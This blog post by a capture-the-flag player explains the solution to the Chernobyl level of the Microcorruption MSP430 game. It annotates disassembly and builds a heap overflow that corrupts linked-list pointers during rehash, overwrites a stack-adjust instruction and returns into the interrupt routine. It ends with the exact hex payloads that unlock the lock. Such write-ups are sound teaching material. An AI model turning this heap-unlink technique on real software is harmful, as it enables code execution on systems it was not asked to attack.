The second-to-last level in Microcorruption! This one took me a bit but I finally got it. I learned a lot about malloc and heap exploitation in the process. I also learned some random facts about Chernobyl, the city / power plant / disaster, too.
This blog post covers the how and why of the solution to the Chernobyl level, as well as my thought process of how I found the solution.
Chernobyl Firmware Updates
First of all, there are some major functionality changes to this version of the lock.
This time around, we have PINs that map to different users.
LockIT Pro Account Manager solves the problem of sharing passwords
when multiple users must have access to a lock. The Account
Manager contains a mapping of users to PINs, each of which is 4
digits. The system supports hundreds of users, each configured
with his or her own PIN, without degrading the performance of the
manager.
There are no accounts set up on the LockIT Pro Account Manager by
default. An administrator must first initialize the lock with user
accounts and their PINs. User accounts are by default not
authorized for access, but can be authorized by attaching the
Account Manager Authorizer. This prevents users from adding
themselves to the lock during its use.
Should be interesting!
A Quick Tour of the Firmware
There’s a lot of code happening here, at least in comparison with previous levels. I ended up copying the code over to a text editor, and splitting each function into its own file. This made it significantly easier to reason with different functions, and also store notes in each section.
So what happens here? Main calls a “run” function:
You might notice that there’s also a “walk” function. There’s a number of other functions, too, including rehash
, add_to_table
, get_from_table
, and printf
, among others. Maybe we can use the printf
for something?
In run, we call create_hash_table
and then query the user, telling them
You can open the door by entering 'access [your name] [pin]'.
I tried guessing a few usernames and PINs and got nowhere. After stepping through the code a bit, and re-reading the release notes, I realized that’s because the lock does not have any usernames configured when we get it.
Before I realized that, however, I wrote my own helper function to see how a byte gets hashed by the hash
function.
#include <stdio.h>
#include <stdint.h>
int main() {
uint16_t original_val = 0b00000000;
while (original_val <= 0b11111111) {
uint16_t val = original_val;
uint16_t sign = 0b10000000 & val;
if (sign == 0b10000000) {
val = val + 0b11110000;
}
int i;
for (i = 0; i < 5; i++)
{
val = val * 2;
}
val = val - original_val; printf("Original val %x --> final val of %x\n", original_val, val);
original_val = original_val + 0b00000001;
}
}
This turned out to be mostly useless in terms of finding the solution to Chernobyl, but it was a fun exercise. I didn’t finish writing it (I’d extend it to include hashing of strings of chars, not just individual chars).
So if there are no preset usernames in the lock controller, does that mean that we’re stuck in this boring loop forever? What about all the other functions? At this point, we’re not calling printf
or any other custom function outside of run
. What about add_to_table
? Sure that gets used for something…
Strings
On top of all of that, we see that there are a number of strings that sound like interesting conditions. For example:
- “User already has an account.”
- “Invalid command.”
- “Access granted.”
- “Access granted; but account not activated.”
- “Access denied. Can not have a pin with high bit set.”
“New” functionality
As it turns out, the lock has a feature that allows it to add new users. How did I find this? I’ll tell you, but first, let’s talk about how the code parses an “access” command.
After you’ve entered a password, you will get to this point in the run
function:
4bbe: 7f90 6100 cmp.b #0x61, r15
4bc2: 3a20 jne #0x4c38 <run+0xd2>
4bc4: 0e4b mov r11, r14
4bc6: 3e50 0700 add #0x7, r14
4bca: 0b4e mov r14, r11
4bcc: 073c jmp #0x4bdc <run+0x76>
The first line is checking r15
(which holds a char from the user’s input) and comparing it to 0x61
, which corresponds to “a”. If it matches, then it adds 0x7 to r14
(which is also pointing to that char). The string “access " is 7 chars long, including the space. If we jump 7 spaces, we’ll be at the value of the username.
You’ll also see lines comparing r15
to 0x20
(a space) and 0x3b
(a semi-colon… this will be useful later).
Then, finally, you’ll see a line comparing r15
to 0x6e
, which is “n”. Then, you increment by 0x4
.
4c38: 7f90 6e00 cmp.b #0x6e, 15
4c3c: 4020 jne #0x4cbe <run+0x158>
4c3e: 094b mov r11, r9
4c40: 2952 add #0x4, r9
What could possibly match that? It doesn’t really matter what the middle chars are, but let’s say for the sake of this blog post that the string is “new “.
That means our format for creating new users is something like
new [username] [pin]
So can we just make a new user account and then log in with that?
new bob 1234
and then
access bob 1234
Will result in this message:
Access granted; but account not activated.
So that didn’t entirely work. What else can we try?
Other options
This section isn’t written in chronological order of when I came up with and tested various ideas. Instead, this is my attempt at organizing them into something sane and readable.
Buffer overflow?
We see that there’s a big ‘ole gets
call in run
:
4bb0: 3e40 5005 mov #0x550, r14
4bb4: 0f41 mov sp, r15
4bb6: b012 404d call #0x4d40 <getsn>
This is what accepts our user input each time, to make a new
user or access
a previous user.
But at the end of the function, we jump 0x600 bytes so there’s no way to use this as a buffer overflow by itself.
4cc8: 3150 0006 add 0x600, sp
4ccc: 3741 pop r7
4cce: 3841 pop r8
4cd0: 3941 pop r9
4cd2: 3a41 pop r10
4cd4: 3b41 pop r11
4cd6: 3041 ret
On top of that, the memory block from 0x3dec
to 0x43f6
gets 00
'd out after each gets
iteration, so if we put shellcode there, we’ve got a limited time before it’s gone.
Printf?
If we make some new users with arbitrary usernames and pins, we see that we’re actually calling the printf
function now, which is cool.
Unfortunately, it looks like we’re out of luck for a string format attack, given the string format specifiers used in the program (vs blindly printing up whatever we submit):
Adding user account %s with pin %x.
That’s too bad.
Game the PIN rules?
Earlier I mentioned a string about having the “high bit set” in a PIN. This is because of how the pin checking works. Presumably, a PIN with the high bit set means that it’s been “activated” (see the “not activated” warning message earlier).
This code starts with a call to get_from_table
, where we’ll do a strcmp on the usernames. We’ll also grab the PIN from memory and store it in r15… unless the usernames don’t match, in which case, r15 holds a value of -1 (or 0xffff)
4c0c: b012 cc49 call #0x49cc
// if we return from get_from_table and the username doesn't match, r15 = 0xffff
4c10: 3f93 cmp #-0x1, r15
// If we don't have a matching username, we print up "no such box" and then jump to a puts call, then we're checking for a ; to see if there are multiple new/access commands chained together.
4c12: 0320 jne #0x4c1a <run+0xb4>
4c14: 3f40 964a mov #0x4a96, r15 // "No such box."
4c18: 413c jmp #0x4c9c <run+0x136>
// if we do have a valid username, then r15 and r10 hold the original and user-inputed PINs.
// xor them together and we should get 0, if r15 == r10
4c1a: 0aef xor r15, r10
// then we AND that result (0 if they match, some other value if not) with 0x7fff so the high bit is cleared. Store the result back in r10.
4c1c: 3af0 ff7f and #0x7fff, r10
// If that is not zero, jump to "access denied"
4c20: 0820 jnz #0x4c32 <run+0xcc>
// otherwise, compare r10 and r15. At this point, r10 = 0, so the only way r15 could be less is... ffff? fffe?
4c22: 0f9a cmp r10, r15
4c24: 0334 jge #0x4c2c <run+0xc6>
4c26: 3f40 a34a mov #0x4aa3, r15 // "Access granted."
4c2a: 383c jmp #0x4c9c <run+0x136>
4c2c: 3f40 b34a mov #0x4ab3, r15 // "Access granted; but account not activated."
4c30: 353c jmp #0x4c9c <run+0x136>
4c32: 3f40 de4a mov #0x4ade, r15 // "Access denied. Can not have a pin with high bit set."
4c36: 323c jmp #0x4c9c <run+0x136>
This tripped me up for quite a while. Since there’s a case where r10
is compared to r15
and access is granted, unconditionally, I tried to reverse engineer that code to see if I could find a way around it. r15
clearly can be a negative number as seen on line 0x4c10
. The other thing that kept me at this strategy longer was this hint on Microcorruption’s about page:
- Zero bottles of beer on the wall, zero bottles of beer; take one down, pass it around, 65535 bottles of beer on the wall.
Of course, that integer underflow doesn’t necessarily apply to this level. Ah well.
Note: I feel like I’m underselling the level of effort that went into the previous sections. Each of these ideas included many walkthroughs and annotating assembly in my notes, often-line-by-line. I kept notes and code samples for everything, but cut it down quite a bit because it’s easier to see the forest for the trees after the fact (like that Margaret Atwood quote “When you are in the middle of a story it isn’t a story at all, but only a confusion… It’s only afterwards that it becomes anything like a story at all. When you are telling it, to yourself or to someone else.")
Anyway…
Really long usernames?
Good idea, but no. Anything past 15 chars gets cutoff. Nice try though, we’d be able to overwrite part of the heap structure or something like that. 😉
Really big PINs
I had been adding 4-digit pins but then I though, what if I make a GIANT pin? As it turns out, no. The number you input is visible to you as a decimal, but is stored as a 2-byte hex value. So a really big value like 65,535 would be 0xFFFF
in code. Anything bigger than that will be rolled over and we’ll only see the part of the value that didn’t roll over.
This overlapped with my attempts to trick the “high bit” logic for the PIN check.
Other functions
There’s still the mysterious walk
function but it doesn’t look like we can reach it. The only other functions we haven’t considered devious things with are malloc
and free
… which are called from a function called rehash
.
Unlike walk
, we actually have a clear path to calling rehash
. How? From the add_to_table
function.
Rehash
Part of my notes said “Limit on how many chars are put into memory… can we somehow run out of space and use something with that?”
When we originally setup the username table, we have a limited amount of space. My idea to run out of malloc’d space is the right idea, but when we run out of room, we’ll end up calling the rehash
function.
How do we definte “running out of room”? When we call add_to_table
, we end up doing this comparison:
485e: 2c9b cmp @r11, r12
4860: 0434 jge #0x486a <add_to_table>
4862: 1e53 inc r14
4864: 0f4b mov r11, r15
4866: b012 d448 call #0x48d4 <rehash>
Where @r11
is the value in 0x5006 and r12
is 0xa. The comparison is greater or equal, so we need to count to at least 0xb entries, starting from 0:
new a 1;new b 2;new c 3;new d 4;new e 5;new f 6;new g 7;new h 8;new i 9;new j 10;new k 11;new l 12;
If you enter in those values, and set a breakpoint at rehash, you’ll be able to step through the function.
What rehash does
Before we get to rehash
, we can see that we’ve got this block at 0x5000 in memory, as well as chunks of data from 0x503c
to 0x533c
.
In other words, we’ve got a block of memory that holds some kind of metadata, and then a linked list of chunks over roughly 0x300 bytes of space.
Rehash does something similar. It malloc
s a block starting at 0x533e
, and then malloc
s several more chunks. These chunks are part of a linked list pointed to by the 0x533e metadata.
After that’s done, and we have chunks spanning all the way to the 0x5980
block of code, we start calling free
.
The first time we call free
, we’re passing in 0x5042
. free
starts looking through the previous linked list (where our usernames are stored) and starts following the forward and back links between the chunks. The last two free
calls overwrite some values in the 0x5000 block to point to the new 0x533e block instead.
Finally, our existing usernames and passwords get copied over after we return from rehash
and go through the rest of add_to_table
Heap Exhaustion
While fussing around with different inputs, I saw this message:
While fussing around wit
Heap exausted; aborting.
It was pretty late at night at this point and it took me a minute to recreate it, but if you provide an input of:
new AAAA 0;new BBBB 0;new CCCC 0;new DDDD 0;new EEEE 0;
You’ll see the memory get filled up as follows:
The blue box contains the backward and forward links for that chunk. And if you look at the pattern of AAAA, BBBB, etc. it looks like the next input will land right on top of it.
In other words, we can overwrite the backward and forward links and stop all over our linked list structure. This doesn’t get us anything until we call rehash, at which time we’re going to step through each of our links to free
memory.
If you watched the program create chunks during either rehash
or create_hash_table
, you’ll notice that it writes those forward and backward links as part of a doubly-linked list. Here’s a few of the program after creating the table, but before any users are added.
This linked list structure is important when we want to free
memory blocks.
When we step through free
later (in the midst of our rehash
call), we’re updating the backwards and forward pointers for our doubly-linked list. Whatever value we put in, we’ll then go to that location in memory and add a back pointer. Then, we’ll add a forward pointer to the next chunk in our list.
If we can overwrite these two pointers, then when we go through rehash
, we’ll be able to clobber whatever two memory addresses we want.
Side note / detour
When I realized that I could plop in (fake) link addresses wherever I wanted, I was still stuck on the idea of getting a PIN with the high bit set. My idea was to overwrite something in the middle of a malloc’d chunk in such a way that a high-bit value would be interpreted as a PIN, since I had totally turned the data structure on its head. Since this is a side note and not the main strategy, clearly it didn’t work out.
It didn’t work out for a number of reasons (and even if it did, I don’t think that that would have unlocked the door… it would just print a success message).
At a certain point in my notes, I wrote “still stepping all over my own toes.” What if I stepped on other toes?
Clobber some other addresses
Clobber part of the interrupt? I was able to do this, with the intention of using the next gets
call to trigger an 7f interrupt. However, because I clobbered part of the interrupt, the gets
call didn’t actually get user input. D’oh.
Historical examples?
At this point, I realized that my clobbering ideas were kind of ineffective and kludgy, so I read a bunch of content about heap exhaustion attacks.
This online resource by Dhaval Kapil was great. In addition to a tour of malloc and free implementation details (most of which are more complex than what Microcorruption / MSP430 uses), he also goes through a series of attacks, which have some very ✨magical ✨ names.
I also went through this Indiana University slide deck by Yan Huang, and several “unlink” tutorials including this and this. Lastly, I read this wonderful (repost?) of Malloc Maleficarum, which is a play on Malleus Maleficarum, a treatise on witchcraft.
In addition to lots of malloc-based attacks, this site also has everything else you could want: some Latin phrases, dramatic names, and some incredible graphic design. 17/10.
Sometimes I wonder if I have enough of a flair for drama to be in infosec.
Anyway, while I didn’t implement any of these attacks directly, I recommend you read them. They were useful in understanding what kinds of attacks are possible when you have control over certain parts of the data structure.
Heap Exhaustion: Redux
Let’s recap so far:
- We can enter in new users using the
new
keyword but we can’t actually gain access. We also can’t currently do a buffer overflow or printf string format attack. - When we add in enough users, we call
rehash
tomalloc
new space andfree
old space. - Because of a mistake in the program, we can overwrite one of the back/forward pointer sections at 0x509c. This will let us clobber any address in memory (downside: we can’t be picky about what we write here).
- There’s no code that does the usual “7f” interrupt so whatever we clobber will have to let us call an interrupt and pass in type “7f”.
Strategy
Since we can clobber any address we want, let’s find a place that lets us call an interrupt with a type of our choosing. As mentioned earlier, I found a few duds, and this blog post is already getting long enough, so let’s cut to the chase.
Previously, I wrote that we can’t do a buffer overflow because we have a gets
call a 0x550 byte buffer length, but later we jump 0x600 bytes after the user input is processed. If we clobber this line, then we can return to an address of our choosing (by appending it to the end of our input string):
4cc8: 3150 0006 add #0x600, sp <-- clobber this
4ccc: 3741 pop r7
4cce: 3841 pop r8
4cd0: 3941 pop r9
4cd2: 3a41 pop r10
4cd4: 3b41 pop r11
4cd6: 3041 ret <-- so when we get here, we return to an address of our choosing
Since we need to trigger an interrupt, let’s ret
to the start of the interrupt function.
Then, in the interrupt function, we can use the value that is two bytes over from the stack pointer to trigger a 7f type interrupt.
4cec <INT>
4cec: 1e41 0200 mov 0x2(sp), r14
4cf0: 0212 push sr
4cf2: 0f4e mov r14, r15
4cf4: 8f10 swpb r15
4cf6: 024f mov r15, sr
4cf8: 32d0 0080 bis #0x8000, sr
4cfc: b012 1000 call #0x10
4d00: 3241 pop sr
4d02: 3041 ret
So let’s get started…
Rehash demo
To show how this works, we’ll enter in the following instructions then run it until you get to rehash.
new AA 0;new BB 1;new CC 1;new DD 1;new EE 1; // filler
6e657720 c64c fc50 c64c // "username" to overwrite the 0x509c links
new Z ;new Y ;new X ;new W ;new V ; // more filler
new ZZZ; // we'll replace this with our shell code eventually
What’s going on in that second instruction? 6e657720
is the hex values for “new “. Then we have our address to clobber (this overwrites the backward link), the current forward link, and then our address again.
Having the address at the end doesn’t really get us anything. If you set a breakpoint at 4708 in malloc
and step through the function once r14 = 509c, you’ll see that our address gets clobbered. I added it to the end of the back/forward link string and found that it helped get my input positioned in the right place. The hash of the username helps determine where it gets placed… rather than find a “cleaner” version of this input string that still positioned it correctly, I decided to leave it as-is.
How did I get c64c
? I took the address of this line:
4cc8: 3150 0006 add #0x600, sp
And then subtracted two bytes from it. Then I swapped the bytes for endianness. I’ll explain the subtraction part in a minute.
Free; or why this approach wor
Again, if you enter in these 4 lines (we’ll condense them in a bit), you should get to the rehash
function.
new AA 0;new BB 1;new CC 1;new DD 1;new EE 1;
6e657720 c64c fc50 c64c
new Z ;new Y ;new X ;new W ;new V ;
new ZZZ;
Set a breakpoint at the start of free
. The second time we visit this function will involve our overwritten links, so continue
one time.
At this line, we move the value of @r15
into r14
. r15
is 0x509c so r14
will be 0x4cc6
472e: 2e4f mov @r15, r14
This means that r14 is holding the back link value for this chunk, and it happens to be the value we overwrote.
A few lines later, we’re copying the value of r12
into 4 bytes past 0x4cc6. This is why we couldn’t just use the value of the “jmp #0x600” line in its original form. If we want to clobber that line, we need to start a few byte addresses earlier.
473e: 8e4c 0400 mov r12, 0x4(r14)
4742: 9e4f 0200 0200 mov 0x2(r15), 0x2(r14)
We also clobber two bytes over from 0x4cc6. As a result, we’ve now written a forward and backward pointer in the middle of existing code (as shown in the blue boxes).
We’ve messed up our linked list, but we’re able to return from the rehash function without exhausting the heap (unlike previous examples).
Once you return from rehash
, set a breakpoint at 0x4cc6 and you’ll see that the next four bytes are overwritten by our forward/back link writing.
The only thing left to do now is create shellcode that ensures that we ret
to the interrupt function from line 0x4cd6, and trigger a 7f interrupt.
Chernobyl Solution
Let’s recap again:
- We can create new users using the
new
keyword. - With a little bit of finagling, we can predict the positions of each username in memory.
- We can also overwrite one of the forward/backward pointer link pairs in the linked list.
- When we have created enough new users (12), we call the rehash function, which
mallocs
new memory andfrees
old memory. - We can take advantage of items 3 and 4 in this list by overwriting the backward pointer to a location in memory we’d like to clobber, say, the part where we move the stack pointer 0x600 bytes before returning.
- The last username we enter will contain shellcode that will return us to the interrupt, and then trigger a 7f interrupt.
Because we have a bunch of pop
s after our clobbered code (from 0x4ccc to 0x4cd4), we’ll have to make sure we have enough filler to position our return address correctly. Then, we’ll want “7f”.
That means that our final username, which doubles as our shellcode, looks like:
["new "] [username and pin] [semicolon] [return address] [two bytes of filler] [7f]
I chose “AAA” as a username, and a pin of 1. The return address is the start of the interrupt function, or 0x4cec. This ends up becoming “4cec”.
[hex equivalent of "new AAA 1;"] [ec4c] [filler of "90 90"] [7f]
The final string is:
6e65772041414120313bec4c90907f
All together now
So, we have 4 groups of inputs:
- 5 “filler” users that help us position the “clobber” user
- A user that will clobber the backwards/forwards linked list addresses to, in turn, in turn, clobber the
add #0x600, sp
line. - 5 more “filler” users.
- One final user that has shellcode at the end.
The actual inputs for each of those are:
new AA 0;new BB 1;new CC 1;new DD 1;new EE 1;
6e657720c64cfc50c64c
(check “hex-encoded”)new Z 1;new Y 2;new X 3;new W 4;new V 5;
6e65772041414120313bec4c90907f
(check “hex-encoded”)
Because it’s annoying to enter 4 different strings, and also costs you more cycles, let’s squash the first 3 into a single string. We’ll need to add a “3b” (semi-colon) at the end of the second string.
If you wanted, you could probably combine the entire thing into one string, but you’d have to position the shellcode near the start of the string.
Solve
The 5 filler users, user that clobbers the backwards/forwards links, and 5 more filler users can be combined into:
6e657720414120303b6e657720424220313b6e657720434320313b6e657720444420313b6e657720454520313b6e657720c64cfc50c64cff3f20363b6e6577205a203b6e65772059203b6e65772058203b6e65772057203b6e65772056203b
Then, the second string remains the same.
6e65772041414120313bec4c90907f
To solve, type solve
and enter those two strings. Make sure you check “hex-encoded” each time.
Ta da!